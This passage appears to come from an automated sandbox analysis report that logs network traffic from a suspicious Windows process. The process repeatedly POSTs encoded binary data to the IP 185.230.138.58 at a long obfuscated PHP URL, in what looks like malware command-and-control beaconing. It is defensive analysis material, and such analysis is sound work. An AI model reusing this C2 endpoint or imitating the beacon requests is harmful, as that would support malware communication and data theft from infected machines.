                                                                                                                                        Dec 21, 2024 10:11:10.092964888 CET5018280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:10.093076944 CET5018180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:10.212769032 CET8050182185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:11:10.213160038 CET8050181185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:11:10.216218948 CET5018280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:10.216325045 CET5018180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:10.216384888 CET5018280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:10.335956097 CET8050182185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:11:10.562321901 CET5018280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:10.682233095 CET8050182185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:11:11.391196012 CET5018280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:11.391279936 CET5018380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:11.468580961 CET8050182185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:11:11.468880892 CET5018280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:11.510956049 CET8050183185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:11:11.511251926 CET5018380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:11.511337042 CET8050182185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:11:11.511380911 CET5018380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:11.511737108 CET5018280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:11.512232065 CET5018480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:11.634352922 CET8050183185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:11:11.637840986 CET8050184185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:11:11.641402006 CET5018480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:11.641402006 CET5018480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:11.762833118 CET8050184185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:11:11.861323118 CET5018380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:11.981405973 CET8050183185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:11:11.981597900 CET8050183185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:11:12.761781931 CET8050183185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:11:12.812249899 CET5018380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:12.889136076 CET8050184185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:11:12.993922949 CET8050183185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:11:13.032198906 CET5018480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:13.046612024 CET5018380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:14.767910957 CET5018480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:11:14.887535095 CET8050184185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:11:15.170377016 CET8050184185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:11:15.218519926 CET5018480192.168.2.4185.230.138.58

                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                        • 185.230.138.58

                                                                                                                                        HTTP Packets

                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        0192.168.2.449730185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:07:17.659485102 CET448OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 344
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:07:18.014355898 CET344OUTData Raw: 05 02 04 0d 03 0a 01 0b 05 06 02 01 02 00 01 01 00 0a 05 0c 02 00 03 0e 07 02 0e 01 06 04 06 03 0f 52 04 5a 07 00 05 04 0b 01 05 01 06 53 06 05 03 03 0c 0c 0f 05 05 07 07 01 07 0c 07 52 07 5d 05 03 0d 09 00 01 06 08 0b 0e 0c 0f 0c 03 0e 51 07 54
                                                                                                                                        Data Ascii: RZSR]QT]\SQP\L}SY}\`LaObvpB\^cU|BhMpy|cx`f|~Tvwl~e~V@xS\~ri
                                                                                                                                        Dec 21, 2024 10:07:18.906742096 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:07:18.997340918 CET1236INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:07:18 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 35 35 63 0d 0a 56 4a 7d 58 6c 0b 7b 07 79 61 63 5a 7f 58 7b 00 7d 01 6f 0c 7f 4e 54 51 6d 4d 6f 5d 6a 62 78 02 76 63 5c 52 6e 72 61 02 75 58 68 00 7d 4b 78 01 55 4b 72 54 77 4c 6b 44 7f 5c 71 4c 7f 59 7d 54 7b 66 68 40 6a 5d 59 03 75 5c 5f 03 76 61 53 48 68 4f 54 49 69 6f 6f 52 6a 67 5a 58 75 66 7b 06 7c 5c 7a 5a 7c 70 79 01 6f 59 7c 43 6f 67 6f 5c 6f 43 7b 48 78 62 59 5c 7b 05 7e 4e 7c 60 78 02 78 67 51 5b 7d 04 6c 5a 61 61 5e 01 7a 51 41 5b 7f 59 70 41 6b 61 7d 40 75 7f 6f 5e 7b 6c 60 46 77 70 5c 40 7a 5f 62 5a 7c 7c 76 4c 78 07 65 5c 76 73 7c 59 77 61 67 5d 63 71 50 50 7e 5d 79 5f 77 5c 6d 05 61 66 73 50 7e 6f 75 00 60 6f 6f 5d 7c 73 6c 06 6f 6f 6f 03 6f 63 76 03 7c 6e 70 08 77 5e 7c 04 7e 61 71 50 7e 7d 6f 08 7b 0b 66 41 6a 62 72 5b 7b 5d 46 51 7d 7c 6b 50 7e 60 5a 0c 7e 59 5c 06 6f 7d 73 03 6f 4c 64 48 68 07 77 01 7d 77 7f 4f 7f 06 62 53 7b 73 6f 5d 7e 72 56 4b 77 4d 65 51 7b 5c 79 4b 75 48 64 03 7d 48 56 40 7e 76 71 42 74 62 67 06 7c 62 5b 04 7f 59 50 0d 78 48 5e 08 7c 73 55 05 75 72 5f 05 77 [TRUNCATED]
                                                                                                                                        Data Ascii: 55cVJ}Xl{yacZX{}oNTQmMo]jbxvc\RnrauXh}KxUKrTwLkD\qLY}T{fh@j]Yu\_vaSHhOTIiooRjgZXuf{|\zZ|pyoY|Cogo\oC{HxbY\{~N|`xxgQ[}lZaa^zQA[YpAka}@uo^{l`Fwp\@z_bZ||vLxe\vs|Ywag]cqPP~]y_w\mafsP~ou`oo]|sloooocv|npw^|~aqP~}o{fAjbr[{]FQ}|kP~`Z~Y\o}soLdHhw}wObS{so]~rVKwMeQ{\yKuHd}HV@~vqBtbg|b[YPxH^|sUur_wOm~qvK~Bd}Iwwa{{\yH|pSK{Ipyg|{}{zbVFzc\OphxY^K~\QvqV}|ww`}qqw|hNx|Rw^T{qu~|TxarKvM{DwqROtq~N~pX@t\mBwet|RSLwR^cRy|g{`fIC^wgxb~~S@xmPL~\u^||BlA~^x~IzCxSc{b|~acJ~YQ|Nqz]|O}bdIvcuAz_euXh~HR}Ha@tLw\iIbxXp}]kHwbuLwO}GqrF~RV}IQDvqc{biI}^SywRNxI`{mQzL`xsb{]NZyddjbOvcXiU|^}gZhba@v`NxBwXvpaSn_v]~Bj_z\y\}b`g{ZL~JxY~MwbivusQ||f^`R`|sly|o{Ni_kChtc[}bvzSYQcT[]ja@SlsTQpUQsMPtGWdDTqYk}ZpA|}zMQYj\``ca{reDvu`|u`@~XmA`L`[hqeO|JzSKsVi`GZ~nXXbVRXeITocCTp{q_UE{raE~`qIzY|y`pFTV]UwBQ`SFPXYWkgz\Y^lXcz~ZDQ^BQ~v~WboAWpg_Xc_WXb^RoC|_\XlZ`qsY@ZXDP}wyYcaBZyoVPoSZUo[P`FgYogz{RcpZN_jaNP~No[ [TRUNCATED]
                                                                                                                                        Dec 21, 2024 10:07:18.997378111 CET224INData Raw: 07 72 4b 50 60 5d 45 52 5a 0c 5b 5b 04 66 4d 50 7d 7a 06 69 00 08 59 69 61 78 01 79 5e 6e 6c 70 5f 45 5a 68 04 66 43 51 74 4b 08 6c 00 55 4d 6b 05 7c 46 5c 61 0d 06 5a 5b 54 7f 68 62 02 5d 79 52 5a 50 66 64 07 43 5c 72 64 5b 7c 70 76 00 6a 6c 6a
                                                                                                                                        Data Ascii: rKP`]ERZ[[fMP}ziYiaxy^nlp_EZhfCQtKlUMk|F\aZ[Thb]yRZPfdC\rd[|pvjlj_UJpG^]YTpBSaQAW[\PWd_QXdsZg\zRY[fXtQ~v~WboAWpg_Xc_mEW_CoblZpGbf|p^ORZaXps~AbisHhu\u{s[k`DTp`\TcUP~XkkjqbQ|Pxz~bqM{
                                                                                                                                        Dec 21, 2024 10:07:19.140192032 CET110INData Raw: 5d 46 51 68 0a 6f 4f 53 73 49 09 69 01 5b 41 6d 0b 4a 45 54 5b 55 41 55 7d 64 58 69 60 7f 0e 78 5d 00 0b 7a 74 0d 42 7d 72 70 01 70 5e 47 51 6e 07 66 45 5b 75 49 03 69 00 5d 42 68 01 6a 48 5b 61 64 05 50 04 05 59 7b 59 5c 50 67 65 08 54 50 5a 5e
                                                                                                                                        Data Ascii: ]FQhoOSsIi[AmJET[UAU}dXi`x]ztB}rpp^GQnfE[uIi]BhjH[adPY{Y\PgeTPZ^Za`O@mXni_GSUFPVk0
                                                                                                                                        Dec 21, 2024 10:07:19.211906910 CET424OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 384
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Dec 21, 2024 10:07:19.560597897 CET384OUTData Raw: 52 54 5a 5a 5f 49 51 5f 5b 59 51 56 59 5b 58 5c 56 5d 5d 5c 5a 5f 5b 41 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: RTZZ_IQ_[YQVY[X\V]]\Z_[A[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!C/;7<'^2<(.-4X9=??1;=))'.X0>$'^& X/,
                                                                                                                                        Dec 21, 2024 10:07:19.605874062 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:07:19.968040943 CET349INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:07:19 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 39 38 0d 0a 01 1f 26 00 35 43 33 54 26 13 2b 54 24 3d 2e 11 2b 07 27 5a 27 2c 21 45 34 33 30 5f 29 2c 24 04 27 2e 3d 05 33 2f 28 55 3f 1e 02 04 2d 20 20 46 04 1c 23 14 2b 0a 29 0f 2a 16 0d 06 2f 38 35 13 3f 0c 04 14 36 3f 32 04 37 58 3a 17 23 0f 21 17 2b 07 26 56 28 27 2c 58 2d 07 2d 03 35 00 23 56 0b 1f 39 1e 3d 0e 0c 12 24 24 3c 16 26 37 3e 57 23 18 28 0a 35 1c 3f 56 21 13 37 5a 25 38 0c 1f 22 16 24 56 2a 01 00 1d 31 39 0e 56 2d 07 26 52 20 0c 29 50 05 35 57 52 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 98&5C3T&+T$=.+'Z',!E430_),$'.=3/(U?- F#+)*/85?6?27X:#!+&V(',X--5#V9=$$<&7>W#(5?V!7Z%8"$V*19V-&R )P5WR0
                                                                                                                                        Dec 21, 2024 10:07:20.004260063 CET425OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1680
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Dec 21, 2024 10:07:20.357543945 CET1680OUTData Raw: 57 5e 5f 5d 5f 48 54 56 5b 59 51 56 59 5d 58 59 56 58 5d 5e 5a 51 5b 41 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: W^_]_HTV[YQVY]XYVX]^ZQ[A[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX"/"$Y#7[$?*[*.57-**$[%^%])90<]376$*'^& X/
                                                                                                                                        Dec 21, 2024 10:07:20.398052931 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:07:20.884708881 CET349INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:07:20 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 39 38 0d 0a 01 1f 26 04 35 25 20 0f 31 3d 38 0b 33 00 25 04 28 2e 05 15 24 2f 31 40 34 0a 3b 00 2a 01 3c 03 25 3e 26 1b 30 5a 34 10 28 56 23 10 2d 0a 20 46 04 1c 20 01 28 30 2a 56 2a 28 3b 00 3b 5e 39 5f 3c 32 21 03 22 2c 0f 5b 23 3d 3a 16 34 1f 29 1a 28 07 00 1a 29 34 27 07 2d 58 2e 5a 35 2a 23 56 0b 1f 3a 0f 2a 20 3e 13 24 09 27 07 26 09 21 08 34 25 37 1b 36 32 05 1c 21 04 20 01 26 01 3a 5d 35 38 2c 1d 29 3f 25 03 31 07 3c 50 3a 07 26 52 20 0c 29 50 05 35 57 52 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 98&5% 1=83%(.$/1@4;*<%>&0Z4(V#- F (0*V*(;;^9_<2!",[#=:4)()4'-X.Z5*#V:* >$'&!4%762! &:]58,)?%1<P:&R )P5WR0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        1192.168.2.449732185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:07:19.703550100 CET425OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Dec 21, 2024 10:07:20.060662985 CET1012OUTData Raw: 52 52 5a 58 5f 47 51 52 5b 59 51 56 59 5c 58 5a 56 5e 5d 56 5a 5c 5b 45 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: RRZX_GQR[YQVY\XZV^]VZ\[E[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!C-!,]!<'Y$?6_*[&#9+<+&9Z<#T$&7:_''^& X/0
                                                                                                                                        Dec 21, 2024 10:07:20.948527098 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:07:21.188690901 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:07:20 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        2192.168.2.449733185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:07:21.479310989 CET425OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Dec 21, 2024 10:07:21.844502926 CET1012OUTData Raw: 57 53 5a 58 5a 42 51 51 5b 59 51 56 59 5e 58 59 56 52 5d 58 5a 5f 5b 43 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WSZXZBQQ[YQVY^XYVR]XZ_[C[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!/"(X#;Y%6)>%#[*Y8Y1;%Y??U$\070'^& X/8
                                                                                                                                        Dec 21, 2024 10:07:22.725459099 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:07:22.960261106 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:07:22 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        3192.168.2.449738185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:07:23.447896957 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:07:23.795291901 CET1012OUTData Raw: 52 57 5a 5a 5a 47 54 56 5b 59 51 56 59 5e 58 5f 56 5c 5d 5e 5a 50 5b 46 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: RWZZZGTV[YQVY^X_V\]^ZP[F[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!,!?#Z<&>_=>1 9=/16(7V'-<\&7^$'^& X/8
                                                                                                                                        Dec 21, 2024 10:07:24.710853100 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:07:24.948200941 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:07:24 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        4192.168.2.449741185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:07:26.020102978 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1888
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:07:26.373260021 CET1888OUTData Raw: 57 55 5a 5f 5f 43 54 51 5b 59 51 56 59 5b 58 5f 56 5f 5d 5e 5a 5f 5b 44 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WUZ__CTQ[YQVY[X_V_]^Z_[D[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!@-!/#<,$,"*-67>"]>([2%?_#S$-$^07]0'^& X/,
                                                                                                                                        Dec 21, 2024 10:07:27.265108109 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:07:27.502410889 CET349INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:07:27 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 39 38 0d 0a 01 1f 26 03 36 1c 2f 57 32 2d 2f 1e 24 3e 31 03 3f 3e 2f 5e 26 3f 26 1a 20 23 15 01 2a 59 30 01 33 10 29 01 24 02 28 1e 3c 56 34 01 2d 1a 20 46 04 1c 23 58 3f 33 2a 50 2a 38 0a 16 2c 38 35 5f 2b 31 26 16 22 2f 29 5b 37 3e 08 5b 23 0f 3e 0c 28 39 00 18 28 24 0a 5e 2d 07 26 10 22 2a 23 56 0b 1f 3a 0f 2a 33 2d 07 24 19 16 58 25 19 0c 56 20 26 2b 14 23 21 38 0f 36 2e 23 11 25 2b 21 00 22 06 20 1d 2a 3f 00 5e 31 29 33 0e 39 3d 26 52 20 0c 29 50 05 35 57 52 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 98&6/W2-/$>1?>/^&?& #*Y03)$(<V4- F#X?3*P*8,85_+1&"/)[7>[#>(9($^-&"*#V:*3-$X%V &+#!86.#%+!" *?^1)39=&R )P5WR0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        5192.168.2.449743185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:07:29.098659039 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:07:29.451376915 CET1012OUTData Raw: 57 51 5a 5a 5a 43 54 56 5b 59 51 56 59 58 58 51 56 5b 5d 5b 5a 5a 5b 45 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WQZZZCTV[YQVYXXQV[][ZZ[E[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX"/]7?%<)*>2U X%+/8]&^%?T$>0Y$7>''^& X/
